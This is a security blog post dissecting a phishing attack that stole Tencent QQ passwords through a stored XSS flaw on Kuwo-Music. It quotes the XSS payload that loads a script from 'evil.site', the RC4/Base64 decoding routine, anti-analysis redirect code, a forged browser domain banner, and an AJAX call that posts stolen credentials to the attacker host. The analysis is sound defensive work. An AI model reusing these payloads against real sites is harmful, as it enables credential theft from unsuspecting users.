•

# Anatomy of a Phishing Attack Sample

Recently, I captured a phishing attack sample stealing Tencent QQ users’ passwords, which begins from a stored XSS vulnerability of Kuwo-Music.

## 0x01 HTTP History Analysis

Open the evil link in QQ(with builtin QQ-Browser), we will see the Q-Zone login form.

Things are never quite as simple as that.
Just enter some data and intercept the http history.

After careful examination, we can get the steps of the hacker are:

1. Visit a shared link to Kuwo-Music.

2. Inculde an evil script from hacker’s site by a stored XSS vulnerability.

<img/onerror=$.getScript("evil.site") src="/">  3. Tamper with the page and make it like Q-Zone login page. 4. Send the form to the hacker’s site. 5. Redirect to real Q-Zone. ## 0x02 Decrypt the Evil JS document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("EzOR8xgd0hrswdhphi+ng4SHKzpw6O4YvNzhnt2Luy3fgnIG3awfb+FPB557W+SKGzRJXh+FheeLSNlKVkTCCV3SuXlaESGcOOQl...  The evil JS is encrypted/encoded in RC4 and Base64. We can use this tool or hacker’s function to decrypt. function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}  The plaintext can be divided into four parts: 1. Redirect to real Q-Zone if User-Agent != QQ-Browser. var p=navigator.platform; system.win=p.indexOf("Win")==0; system.mac=p.indexOf("Mac")==0; system.x11=(p=="X11")||(p.indexOf("Linux")==0); if(system.win||system.mac||system.xll) { window.location.href="http://qzone.qq.com" } if(navigator.userAgent.indexOf('QQ/')>0) {} else{ window.location.href='http://qzone.qq.com' }  2. Forged dropdown box(security verification of QQ-Browser) var doc =$(document);
var _touches_point1 = 0;
var _touches_point2 = 0;
function(a)
{
_touches_point1=a.touches[0].pageY
}
);
function(a)
{
_touches_point2=a.touches[0].pageY;
if(doc.scrollTop()<=0&&_touches_point1<_touches_point2)
{
a.preventDefault();
if($("#_domain_display").length<=0) {$("body").prepend('<div id="_domain_display" style="text-align:center;background-color:#bebdc2;color:#65696c;height:0px;padding-top:15px;line-height:26px;font-size:12px;overflow:hidden;"><p>网页由 '+'ui.ptlogin2.qq.com'+' 提供</p><p>QQ浏览器X5内核提供技术支持</p></div>')
}
$("#_domain_display").height((_touches_point2-_touches_point1)) } } ); addEventListener("touchend", function(a) {$("#_domain_display").slideUp("normal",
function()
{
$("#_domain_display").remove() } ) } );  3. Forged login form. 4. Send form to hacker’s site and redirect to real Q-Zone. if (!err){$.ajax({
url:'//evil.site',
type:'POST',
dataType:'json',
error:function(er){
window.location.href='https://qzone.qq.com';
}
})
}


## 0x03 Reproduce XSS Vulnerability

Let’s go back and look at the attack’s entrance - a stored XSS vulnerability.

After Fuzzing and fuzzing, we finally know the poc.

Vulnerability report has been submitted.

## 0x04 Summary

I have to say, this phishing attack sample is very good in disguise.

Because the attack comes from a wellknown site, people generally don’t have doubts, they just fill in the passwords to see what interesting things the hacker shared.

And the hacker checks user-agent to prevent anyone from opening the normal browser for further observation, which would jump to the real website.

So I saw this phishing attack sample more than once.
There should be a vast number of people cheated.